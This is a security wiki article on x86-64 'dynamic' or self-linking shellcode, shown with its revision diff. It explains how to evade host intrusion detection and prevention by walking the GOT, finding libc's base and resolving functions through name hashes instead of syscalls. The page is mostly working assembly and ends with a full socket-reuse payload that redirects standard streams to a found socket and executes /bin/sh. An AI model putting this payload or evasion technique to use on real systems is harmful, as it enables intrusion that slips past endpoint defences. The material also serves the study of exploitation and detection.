Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Shellcode/Dynamic"

From NetSec
Jump to: navigation, search
(Justification)
 
(62 intermediate revisions by 3 users not shown)
Line 1: Line 1:
Dynamic, or self-linking code is built to [[IDS evasion|evade]] several types of host-layer [[countermeasures]] from [[SIM|security infrastructure]] (such as [[HIDS]] and [[HIPS]] engines) that can prevent the execution of traditional 'unlinked' [[shellcode]] because it contains no interrupts, syscalls, or [[plaintext]] function strings.   
+
'''Dynamic [[shellcode]]''' or ''self-linking [[shellcode]]'' is built to [[IDS evasion|evade]] several types of host-layer [[countermeasures]] from [[SIM|security infrastructure]] (such as [[HIDS]] and [[HIPS]] engines) that can prevent the execution of traditional 'unlinked' [[null-free shellcode]], doing so by, for example, containing no interrupts, syscalls, or [[plaintext]] function strings.   
 +
 
 +
 
 +
{{info|<center>The code and ideas discussed here are part of an [[shellcode|all-encompassing shellcode portal]]. Everything described here and the full source of any given code is available in [[Shellcode/Appendix#Dynamic|the appendix]], as well as in the downloadable [[shellcodecs]] package.</center>}}
 +
 
  
 
=== Justification ===
 
=== Justification ===
Most [[SIM|security infrastructure]] components do runtime analysis based on the contents of [[ram|RAM]] in both data and executable marked segments.  Moreover, many of these systems may even inspect kernel interrupts and syscalls from within the kernel.  Others may monitor the functionality of _ld_runtime_resolve, a trampoline to _dl_fixup(), provided by ld-linux for a normal application to make shared library calls.  Many of these systems will be alerted by applications trying to execute syscalls or interrupts without having them in their .text segments, or when an application attempts to use _ld_runtime_resolve, _dl_fixup, dl_open, dl_close, or dl_sym to import a function not listed in its import table.  Additionally, using functions such as dl_open() and dl_sym() require the use of plaintext strings.  Any analyst with any level of common sense would be able to reverse engineer the payload quickly - another problem presented by traditional [[null-free shellcode]].
+
Most [[SIM|security infrastructure]] components do runtime analysis based on the contents of [[ram|RAM]] in both data and executable marked segments.  Moreover, many of these systems may even inspect kernel interrupts and syscalls from within the kernel.  Others may monitor the functionality of _ld_runtime_resolve, a trampoline to _dl_fixup(), provided by ld-linux for a normal application to make shared library calls.  Many of [[HIPS|these systems]] will be alerted by [[application]]s trying to execute syscalls or interrupts without having them in their .text segments, or when an application attempts to use _ld_runtime_resolve, _dl_fixup, dl_open, dl_close, or dl_sym to import a function not listed in its import table.  Additionally, using functions such as dl_open() and dl_sym() require the use of [[plaintext]] strings.  Any analyst with a level of common sense would be able to reverse engineer the payload quickly - another problem presented by traditional [[null-free shellcode]].
  
  
  
A dynamic shellcode engine is able to solve these problems.  By avoiding [[register]]s used by the [[C]] calling convention, it is possible to construct a linker that allows a developer to write dynamically self-linking code.  This discards the need for interrupts and syscalls entirely, as a linker is able to import functions without assistance from the kernel.  Additionally, function hashing is used to prevent function names from displaying within string data, solving the problems with standard [[null-free shellcode]] listed above.
+
A dynamic shellcode engine is able to solve these problems.  By avoiding [[register]]s used by the [[C]] calling convention, it is possible to construct a linker that allows a developer to write dynamically self-linking code.  This discards the need for interrupts and syscalls entirely, as a linker is able to import functions without assistance from the [[operating system]].  Additionally, function [[cryptography#Hashes|hashing]] is used to prevent function names from displaying within string data, solving the problems with standard [[null-free shellcode]] listed above.
  
 
=== The C Calling convention's impact ===
 
=== The C Calling convention's impact ===
 
* The usual format for a system call or libc function invokation:
 
* The usual format for a system call or libc function invokation:
 
{{code|text=<source lang="asm">  function_call(%rax) = function(%rdi,  %rsi,  %rdx,  %r10,  %r8,  %r9)</source>}}
 
{{code|text=<source lang="asm">  function_call(%rax) = function(%rdi,  %rsi,  %rdx,  %r10,  %r8,  %r9)</source>}}
* The return value is usually returned into the %rax register.
+
* The return value is usually returned into the %rax register, however when struct pointers are passed as arguments, a pointer to the modified struct returns in that argument [[register]].
  
Because of the above statement, we can see easily when writing a linker that the following registers need not be reserved for function calls before calling them without syscalls:
+
The above statement dictates that when writing a linker, the following registers need not be preserved for function calls before invokation without syscalls:
 
{{code|text=<source lang="asm">  %rax, %rbx, %rcx, %rbp, %r11, %r12, %r13, %r14, %r15</source>}}
 
{{code|text=<source lang="asm">  %rax, %rbx, %rcx, %rbp, %r11, %r12, %r13, %r14, %r15</source>}}
  
Most of these registers can get blown away by different libc functions, however %rbx is reserved for "developer use" by libc.  When writing a dynamic linker, function arguments must be preserved so that a developer can easily write dynamically integrated code.  To that end, this linker takes %rbx as the base pointer to a library and %rbp for a function hash.  This ensures that the developer maintains control over %rax, %rdi, %rsi, %rdx, %r10, %r8, and %r9.  The %rcx register is used as the pointer to the ''invoke_function'' label.  Developers should be aware to preserve this when invoking functions which may destroy the register, or change this by changing the register popped in the ''__initialize_world'' label.
+
Most of these [[register]]s can get blown away or destroyed by various libc functions, however '''%rbx''' is reserved for "developer use" by libc.  When writing a dynamic linker, function arguments must be ''preserved'' so that a developer can easily write dynamically integrated code.  To that end, this linker takes %rbx as the [[base pointer]] to a library and %rbp for a function [[cryptography#Hashing|hash]].  This ensures that the developer maintains control over %rax, %rdi, %rsi, %rdx, %r10, %r8, and %r9.  The %rcx register is used as the [[pointer]] to the ''invoke_function'' label, and may need to be preserved between [[#The_invoking_of_functions|function invokation]].
  
 
=== Function hashing ===
 
=== Function hashing ===
* Additional labels have been added to make this more readable.
+
{{info|<center>Additional labels have been added to make this more readable.</center>}}
{{code|text=<source lang="asm">  
+
 
calc_hash:
+
This functionality expects %rdx to be zero and a pointer to a string in %rsi.  It then makes a one-way 32-bit hash of the string and places the hash into %rsi.
 +
 
 +
* First, the [[register]]s used by [[Shellcode/Appendix#hash-generator.s|the hasher]] other than %rsi are preserved.
 +
{{code|text=<source lang="asm">calc_hash:
  
 
preserve_regs:
 
preserve_regs:
 
   push %rax
 
   push %rax
 
   push %rdx
 
   push %rdx
   
+
</source>}}
 +
 
 +
* The %rdx register is used as a ''zreg'', or '''zero register''' by the code that invokes the hasher. This makes it possible to zero out the %rax register with a simple push/pop mov emulation:
 +
{{code|text=<source lang="asm">
 
initialize_regs:
 
initialize_regs:
 
   push %rdx
 
   push %rdx
 
   pop %rax
 
   pop %rax
   cld
+
</source>}}
   
+
 
calc_hash_loop:
+
* Next, the directional flag is cleared.  This is important because the '''lodsd''' is used during the [[Cryptography#Hashes|hashing]] process and the state of the directional flag set by the [[vulnerability|vulnerable]] [[application]] is ''unknown''.
 +
{{code|text=<source lang="asm">   cld
 +
</source>}}
 +
 
 +
* To make the one-way 32 bit hash, the byte in %al to %edx must be added, doing a [[bit rotation]] to the left by 12 (0xC) [[byte]]s.  When the byte loaded by '''lodsd''' is null, the [[cryptography#Hashes|hash]] of the string has been fully calculated.  
 +
{{code|text=<source lang="asm">calc_hash_loop:
 
   lodsb
 
   lodsb
 
   rol $0xc, %edx
 
   rol $0xc, %edx
Line 38: Line 53:
 
   test %al, %al
 
   test %al, %al
 
   jnz calc_hash_loop
 
   jnz calc_hash_loop
+
</source>}}
 +
 
 +
* Now use [[push]] and [[pop]] as a '''mov emulation''' again to place the hash into %rsi:
 +
{{code|text=<source lang="asm">
 
calc_done:
 
calc_done:
 
   push %rdx
 
   push %rdx
 
   pop %rsi
 
   pop %rsi
 +
</source>}}
  
restore_regs:
+
* Finally, ''restore'' the preserved registers:
 +
{{code|text=<source lang="asm">restore_regs:
 
   pop %rdx  
 
   pop %rdx  
 
   pop %rax
 
   pop %rax
Line 49: Line 69:
  
 
=== Dynamic section traversal to the GOT ===
 
=== Dynamic section traversal to the GOT ===
 +
* The dynamic section's program header for the currently executing process will always have a VMA of 0x00400130. The following code can be used to get there [[null-free shellcode|without using any null bytes]]:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
_start:
 
_start:
Line 56: Line 77:
 
</source>}}
 
</source>}}
  
 +
* The [[pointer]] to the dynamic section is extracted and added to the length of the dynamic section.  The '''GOT''' (Global Offset Table) is ''immediately after'' the dynamic section. By calculating the offset in this fashion, the '''GOT''' can be traversed ''without reading its location from the headers''.  This is beneficial for a myriad of reasons.
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
fast_got:
 
fast_got:
Line 63: Line 85:
  
 
=== Extracting a library pointer ===
 
=== Extracting a library pointer ===
 +
* This code extracts a pointer to an arbitrary function inside of libc from the '''GOT'''.  An alternative to libc is at 0x18(%rcx), a pointer to ''_dl_runtime_resolve'' from the ''ld-linux'' shared object library. 
 
{{code|text=<source lang="asm">  
 
{{code|text=<source lang="asm">  
 
extract_pointer:
 
extract_pointer:
Line 68: Line 91:
 
</source>}}
 
</source>}}
  
 +
* Now just look for the [[base pointer]] of the [[binary]] selected for importing by looking for \x7f followed by the text string "ELF".  Because the [[ram|RAM]] holds the information backwards, a backwards comparison is used for this determination while looping backwards:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
find_base:
 
find_base:
Line 76: Line 100:
  
 
=== Staging the user defined code ===
 
=== Staging the user defined code ===
* Now that a base pointer has been calculated, it is time to stage the developer or user-defined code.  To make invoke_function re-usable from a register, a [[#GetPc|getPc]] via %rcx is invoked that jumps to the ''_world'' label and never returns.  The address of ''invoke_function'' has then been stored in the %rcx register, allowing developers to access it efficiently.
+
* Now that a [[base pointer]] has been calculated, it is time to stage the developer or user-defined code.  To make invoke_function re-usable from a [[register]], a [[Shellcode/Environment#GetPc|getPc]] via %rcx is invoked that jumps to the ''_world'' label and never returns.  This is how the [[memory addresses|address]] of ''invoke_function'' is stored in the %rcx register, allowing developers to access it efficiently.
 
{{code|text=<source lang="asm">  
 
{{code|text=<source lang="asm">  
 
jmp startup
 
jmp startup
Line 93: Line 117:
  
 
=== The interface ===
 
=== The interface ===
The runtime linker developed here allows user-defined code to start at the ''_world'' label.  This example is a small dynamic snippet that when combined with the linker's [[API]] equivocates to `exit()':
+
The runtime linker developed here allows user-defined code to start at the ''_world'' label.  The interface allows a developer to provide a function ''hash'' into the ''%rbp'' [[register]] and then execute '''call *%rcx''' in stead of a syscall.  This example is describes the process to move from kernel syscalls for exit(0) to using the linker's [[API]] to invoke `exit(0)' ([[Shellcode/Appendix#linked-exit.s|full source]]).
  
 +
* Beginning with the unlinked form of exit:
 +
{{code|text=<source lang="asm">
 +
exit:
 +
  push $0x3c
 +
  pop %rax
 +
  xor %rdi, %rdi
 +
  syscall
 +
</source>}}
 +
 +
 +
* The hash for "exit" is calculated using the [[Shellcode/Appendix#hash-generator.s|hash generator]] provided with [[shellcodecs]]:
 +
{{LinuxCMD|./hash-generator exit&#x7c;hexdump -C
 +
00000000  69 6c 47 80                                      &#x7c;ilG.&#x7c;}}
 +
 +
 +
* Then the hash is placed into %rbp.  When the x64 register arguments have been set, call *%rcx is used to invoke the function:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
_world:
 
_world:
Line 102: Line 142:
 
   call *%rcx
 
   call *%rcx
 
</source>}}
 
</source>}}
 +
 +
{{warning|<center>Developers should be aware to preserve %rcx when invoking functions which may destroy the register, or remove this limitation by changing the register popped in the '''__initialize_world''' label.</center>}}
  
 
=== The invoking of functions ===
 
=== The invoking of functions ===
 +
* A comment has been provided in case developers forget [[#The_interface|the interface functionality]]:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
;
 
;
 
;  Takes a function hash in %rbp and base pointer in %rbx
 
;  Takes a function hash in %rbp and base pointer in %rbx
;  >Parses the dynamic section headers of the ELF64 image
+
;  >Parses the dynamic program headers of the ELF64 image
 
;  >Uses ROP to invoke the function on the way back to the
 
;  >Uses ROP to invoke the function on the way back to the
 
;  -normal return location
 
;  -normal return location
Line 115: Line 158:
 
</source>}}
 
</source>}}
  
 +
 +
* All of the [[register]]s that may interact with libc along with any registers that may be used by the linker must be preserved so that they can be restored for function invokation.  The %rbp register is preserved twice.  This is because the first preservation is overwritten with a [[pointer]] to the desired function before returning.  This allows the [[shellcode]] to [[ROP|return from the desired function back to developer-defined code]].
 
{{code|text=<source lang="asm">invoke_function:
 
{{code|text=<source lang="asm">invoke_function:
 
   push %rbp
 
   push %rbp
Line 125: Line 170:
 
</source>}}
 
</source>}}
  
 +
* Now zero the %rdx register and place the function hash into %rdi for future comparison.
 
{{code|text=<source lang="asm">set_regs:
 
{{code|text=<source lang="asm">set_regs:
 
   xor %rdx, %rdx
 
   xor %rdx, %rdx
Line 131: Line 177:
 
</source>}}
 
</source>}}
  
 +
* Then the base pointer of the desired library to import from is placed into %rbp
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
copy_base:
 
copy_base:
Line 137: Line 184:
 
</source>}}
 
</source>}}
  
 +
* This is a hack to get to the dynamic offset.  It's necessary to access 0x130(%rbx) for four bytes, but add it to an eight-byte register. %ebx can't be added to because this will chop %rbx in half - so add the offset to the dynamic section to the base pointer using [[indexed addressing mode]].  Because $0x4c * 4 = 0x130, and %rbx is the base pointer, the following code will suffice:
 
{{code|text=<source lang="asm">read_dynamic_section:
 
{{code|text=<source lang="asm">read_dynamic_section:
 
   push $0x4c
 
   push $0x4c
Line 143: Line 191:
 
</source>}}
 
</source>}}
  
 +
* Try to to find the function export table.  Typically, this table is called .dynsym, or the dynamic symbol table.  Do this by iterating through the headers, checking for the type of dynamic section:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
check_dynamic_type:
 
check_dynamic_type:
Line 150: Line 199:
 
</source>}}
 
</source>}}
  
 +
* Once the %rbx register is positioned at the correct program header for the dynamic symbol table, place the absolute address to the string table into %rax and the absolute address to the dynamic symbol table into %rbx.
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
string_table_found:
 
string_table_found:
Line 156: Line 206:
 
</source>}}
 
</source>}}
  
 +
* Here, it's incremented to the next export and the pointer is put to its string into %rsi for hashing:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
check_next_hash:
 
check_next_hash:
Line 165: Line 216:
 
</source>}}
 
</source>}}
  
 +
* The calc_hash label is invoked [[#Function_hashing|as described above]] for function hashing.
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
calc_hash:
 
calc_hash:
Line 170: Line 222:
 
</source>}}
 
</source>}}
  
 +
* Compare the function hash of the current export with the hash of the desired import.  If the hashes are not equal, loop to the next import.
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
check_current_hash:
 
check_current_hash:
Line 176: Line 229:
 
</source>}}
 
</source>}}
  
 +
* Once the hash is found, its function offset is located at 0x8(%rbx) for four bytes. %rdx is used as a ''zreg'' in this equation to access the four bytes without nulls - and add them to %rbp, the base pointer:
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
found_hash:
 
found_hash:
 
   add 0x8(%rbx,%rdx,4), %rbp
 
   add 0x8(%rbx,%rdx,4), %rbp
 +
</source>}}
 +
 +
* Here, the first instance of %rbp that was preserved with the location of the desired function is overwritten:
 +
{{code|text=<source lang="asm">
 
   mov %rbp, 0x30(%rsp)
 
   mov %rbp, 0x30(%rsp)
  pop %rsi
+
</source>}}
 +
 
 +
* Then restore all registers.  This will align the return pointer to point at the desired function, and the pointer immediately following it in the [[call stack]] points to the original return pointer, the location after the code which invoked this function.
 +
{{code|text=<source lang="asm">  pop %rsi
 
   pop %rbx
 
   pop %rbx
 
   pop %rax
 
   pop %rax
Line 190: Line 251:
  
 
=== The dynamic shell ===
 
=== The dynamic shell ===
* Once added to the linker, this becomes a total of a 270 byte dynamic port of the 115 byte [[Shellcode/Socket-reuse|socket-reuse]] payload.  There are a few ways to optimize it that will be left for the reader to discover.   
+
* Once added to the linker, this becomes a total of a 268 byte dynamic port of the 115 byte [[Shellcode/Socket-reuse|socket-reuse]] payload.  There are a few ways to optimize it that will be left for the reader to discover.   
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
 
_world:
 
_world:
Line 219: Line 280:
 
   jne loop
 
   jne loop
  
   # If we make it here, rbx and rax are 0
+
   # If sucessful, rbx and rax are 0
 
check_ip:
 
check_ip:
 
   push $0x1b
 
   push $0x1b
Line 254: Line 315:
 
   movl $0xf66bbb37, %ebp        # Place the function hash for execve() into %rbp
 
   movl $0xf66bbb37, %ebp        # Place the function hash for execve() into %rbp
  
   xor %rdi, %rdi
+
   pop %rdi
 
   push %rdi                       
 
   push %rdi                       
 
   push %rdi
 
   push %rdi
Line 267: Line 328:
 
   call *%rcx                    # execve('/bin/sh',0,0);
 
   call *%rcx                    # execve('/bin/sh',0,0);
 
</source>}}
 
</source>}}
 +
 +
{{social}}

Latest revision as of 03:35, 25 April 2013

Dynamic shellcode or self-linking shellcode is built to evade several types of host-layer countermeasures from security infrastructure (such as HIDS and HIPS engines) that can prevent the execution of traditional 'unlinked' null-free shellcode, doing so by, for example, containing no interrupts, syscalls, or plaintext function strings.


c3el4.png
The code and ideas discussed here are part of an all-encompassing shellcode portal. Everything described here and the full source of any given code is available in the appendix, as well as in the downloadable shellcodecs package.


Justification

Most security infrastructure components do runtime analysis based on the contents of RAM in both data and executable marked segments. Moreover, many of these systems may even inspect kernel interrupts and syscalls from within the kernel. Others may monitor the functionality of _ld_runtime_resolve, a trampoline to _dl_fixup(), provided by ld-linux for a normal application to make shared library calls. Many of these systems will be alerted by applications trying to execute syscalls or interrupts without having them in their .text segments, or when an application attempts to use _ld_runtime_resolve, _dl_fixup, dl_open, dl_close, or dl_sym to import a function not listed in its import table. Additionally, using functions such as dl_open() and dl_sym() require the use of plaintext strings. Any analyst with a level of common sense would be able to reverse engineer the payload quickly - another problem presented by traditional null-free shellcode.


A dynamic shellcode engine is able to solve these problems. By avoiding registers used by the C calling convention, it is possible to construct a linker that allows a developer to write dynamically self-linking code. This discards the need for interrupts and syscalls entirely, as a linker is able to import functions without assistance from the operating system. Additionally, function hashing is used to prevent function names from displaying within string data, solving the problems with standard null-free shellcode listed above.

The C Calling convention's impact

  • The usual format for a system call or libc function invokation:
   function_call(%rax) = function(%rdi,  %rsi,  %rdx,  %r10,  %r8,  %r9)
  • The return value is usually returned into the %rax register, however when struct pointers are passed as arguments, a pointer to the modified struct returns in that argument register.

The above statement dictates that when writing a linker, the following registers need not be preserved for function calls before invokation without syscalls:

  %rax, %rbx, %rcx, %rbp, %r11, %r12, %r13, %r14, %r15

Most of these registers can get blown away or destroyed by various libc functions, however %rbx is reserved for "developer use" by libc. When writing a dynamic linker, function arguments must be preserved so that a developer can easily write dynamically integrated code. To that end, this linker takes %rbx as the base pointer to a library and %rbp for a function hash. This ensures that the developer maintains control over %rax, %rdi, %rsi, %rdx, %r10, %r8, and %r9. The %rcx register is used as the pointer to the invoke_function label, and may need to be preserved between function invokation.

Function hashing

c3el4.png
Additional labels have been added to make this more readable.

This functionality expects %rdx to be zero and a pointer to a string in %rsi. It then makes a one-way 32-bit hash of the string and places the hash into %rsi.

calc_hash:
 
preserve_regs:
  push %rax
  push %rdx
 
  • The %rdx register is used as a zreg, or zero register by the code that invokes the hasher. This makes it possible to zero out the %rax register with a simple push/pop mov emulation:
 
initialize_regs:
  push %rdx
  pop %rax
 
  • Next, the directional flag is cleared. This is important because the lodsd is used during the hashing process and the state of the directional flag set by the vulnerable application is unknown.
   cld
 
  • To make the one-way 32 bit hash, the byte in %al to %edx must be added, doing a bit rotation to the left by 12 (0xC) bytes. When the byte loaded by lodsd is null, the hash of the string has been fully calculated.
calc_hash_loop:
  lodsb
  rol $0xc, %edx
  add %eax, %edx
  test %al, %al
  jnz calc_hash_loop
 
  • Now use push and pop as a mov emulation again to place the hash into %rsi:
 
calc_done:
  push %rdx
  pop %rsi
 
  • Finally, restore the preserved registers:
restore_regs:
  pop %rdx 
  pop %rax
 

Dynamic section traversal to the GOT

  • The dynamic section's program header for the currently executing process will always have a VMA of 0x00400130. The following code can be used to get there without using any null bytes:
 
_start:
  push $0x400130ff
  pop %rbx
  shr $0x8, %ebx
 
  • The pointer to the dynamic section is extracted and added to the length of the dynamic section. The GOT (Global Offset Table) is immediately after the dynamic section. By calculating the offset in this fashion, the GOT can be traversed without reading its location from the headers. This is beneficial for a myriad of reasons.
 
fast_got:
  mov (%rbx), %rcx
  add 0x10(%rbx), %rcx
 

Extracting a library pointer

  • This code extracts a pointer to an arbitrary function inside of libc from the GOT. An alternative to libc is at 0x18(%rcx), a pointer to _dl_runtime_resolve from the ld-linux shared object library.
 
extract_pointer:
  mov 0x20(%rcx), %rbx
 
  • Now just look for the base pointer of the binary selected for importing by looking for \x7f followed by the text string "ELF". Because the RAM holds the information backwards, a backwards comparison is used for this determination while looping backwards:
 
find_base:
  dec %rbx
  cmpl $0x464c457f, (%rbx)
jne find_base
 

Staging the user defined code

  • Now that a base pointer has been calculated, it is time to stage the developer or user-defined code. To make invoke_function re-usable from a register, a getPc via %rcx is invoked that jumps to the _world label and never returns. This is how the address of invoke_function is stored in the %rcx register, allowing developers to access it efficiently.
 
jmp startup
 
__initialize_world:
  pop %rcx
  jmp _world
 
startup:
  call __initialize_world
invoke_function:
  ...
_world:
  ; user-defined code goes here
 

The interface

The runtime linker developed here allows user-defined code to start at the _world label. The interface allows a developer to provide a function hash into the %rbp register and then execute call *%rcx in stead of a syscall. This example is describes the process to move from kernel syscalls for exit(0) to using the linker's API to invoke `exit(0)' (full source).

  • Beginning with the unlinked form of exit:
 
exit:
  push $0x3c
  pop %rax
  xor %rdi, %rdi
  syscall
 


Terminal

localhost:~ $ ./hash-generator exit|hexdump -C 00000000 69 6c 47 80 |ilG.|


  • Then the hash is placed into %rbp. When the x64 register arguments have been set, call *%rcx is used to invoke the function:
 
_world:
  push $0x696c4780
  pop %rbp
  xor %rdi, %rdi
  call *%rcx
 
RPU0j.png
Developers should be aware to preserve %rcx when invoking functions which may destroy the register, or remove this limitation by changing the register popped in the __initialize_world label.

The invoking of functions

 
;
;  Takes a function hash in %rbp and base pointer in %rbx
;  >Parses the dynamic program headers of the ELF64 image
;  >Uses ROP to invoke the function on the way back to the
;  -normal return location
;
;  Returns results of function to invoke.
;
 


invoke_function:
  push %rbp
  push %rbp
  push %rdx
  push %rdi
  push %rax
  push %rbx      
  push %rsi
 
  • Now zero the %rdx register and place the function hash into %rdi for future comparison.
set_regs:
  xor %rdx, %rdx
  push %rbp
  pop %rdi
 
  • Then the base pointer of the desired library to import from is placed into %rbp
 
copy_base:
  push %rbx
  pop %rbp
 
  • This is a hack to get to the dynamic offset. It's necessary to access 0x130(%rbx) for four bytes, but add it to an eight-byte register. %ebx can't be added to because this will chop %rbx in half - so add the offset to the dynamic section to the base pointer using indexed addressing mode. Because $0x4c * 4 = 0x130, and %rbx is the base pointer, the following code will suffice:
read_dynamic_section:
  push $0x4c
  pop %rax
  add (%rbx, %rax, 4), %rbx
 
  • Try to to find the function export table. Typically, this table is called .dynsym, or the dynamic symbol table. Do this by iterating through the headers, checking for the type of dynamic section:
 
check_dynamic_type:
  add $0x10, %rbx
  cmpb $0x5, (%rbx)
  jne check_dynamic_type
 
  • Once the %rbx register is positioned at the correct program header for the dynamic symbol table, place the absolute address to the string table into %rax and the absolute address to the dynamic symbol table into %rbx.
 
string_table_found:
  mov 0x8(%rbx), %rax       # %rax is now location of dynamic string table
  mov 0x18(%rbx), %rbx      # %rbx is now a pointer to the symbol table.
 
  • Here, it's incremented to the next export and the pointer is put to its string into %rsi for hashing:
 
check_next_hash:
  add $0x18, %rbx
  push %rdx
  pop %rsi
  xorw (%rbx), %si
  add %rax, %rsi
 
 
calc_hash:
   ...
 
  • Compare the function hash of the current export with the hash of the desired import. If the hashes are not equal, loop to the next import.
 
check_current_hash:
  cmp %esi, %edi
  jne check_next_hash
 
  • Once the hash is found, its function offset is located at 0x8(%rbx) for four bytes. %rdx is used as a zreg in this equation to access the four bytes without nulls - and add them to %rbp, the base pointer:
 
found_hash:
  add 0x8(%rbx,%rdx,4), %rbp
 
  • Here, the first instance of %rbp that was preserved with the location of the desired function is overwritten:
 
  mov %rbp, 0x30(%rsp)
 
  • Then restore all registers. This will align the return pointer to point at the desired function, and the pointer immediately following it in the call stack points to the original return pointer, the location after the code which invoked this function.
  pop %rsi
  pop %rbx
  pop %rax
  pop %rdi
  pop %rdx
  pop %rbp
ret
 

The dynamic shell

  • Once added to the linker, this becomes a total of a 268 byte dynamic port of the 115 byte socket-reuse payload. There are a few ways to optimize it that will be left for the reader to discover.
 
_world:
  movl $0xf8cc01f7, %ebp   # hash of getpeername() is in %rbp
  push $0x02
  pop %rdi
 
make_fd_struct:
  lea -0x14(%rsp), %rdx
  movb $0x10, (%rdx)
  lea 0x4(%rdx), %rsi # move struct into rsi
 
loop:
  inc %di
  jz exit
 
stack_fix:
  lea 0x14(%rdx), %rsp
 
get_peer_name:
  sub $0x20, %rsp
  push %rcx
  call *%rcx               # getpeername(counterfd,sockaddr_in)
  pop %rcx
 
check_pn_success:
  test %al, %al
  jne loop
 
  # If sucessful, rbx and rax are 0
check_ip:
  push $0x1b
  pop %r8
  mov $0xfeffff80, %eax
  not %eax
  cmpl %eax, (%rsp,%r8,4)
  jne loop
 
check_port:
  movb $0x35, %r8b
  mov $0x2dfb, %ax
  not %eax
  cmpw %ax,(%rsp, %r8 ,2) # 
  jne loop
 
  push $0x70672750
  pop %rbp                # Function hash of dup2() is in rbp
 
reuse:
  xor %rdx, %rdx
  push %rdx
  push %rdx
  pop %rsi
 
dup_loop:       # redirect stdin, stdout, stderr to socket
  push %rcx
  call *%rcx    # dup2(sockfd,std[err|in|out]);
  pop %rcx
  inc %esi
  cmp $0x4, %esi
  jne dup_loop
 
  movl $0xf66bbb37, %ebp         # Place the function hash for execve() into %rbp
 
  pop %rdi
  push %rdi                      
  push %rdi
  pop %rsi                     
  pop %rdx                       # Null out %rdx and %rdx (second and third argument)
  mov $0x68732f6e69622f6a,%rdi   # move 'hs/nib/j' into %rdi
  shr $0x8,%rdi                  # null truncate the backwards value to '\0hs/nib/'
  push %rdi      
  push %rsp 
  pop %rdi                       # %rdi is now a pointer to '/bin/sh\0'
 
  call *%rcx                     # execve('/bin/sh',0,0);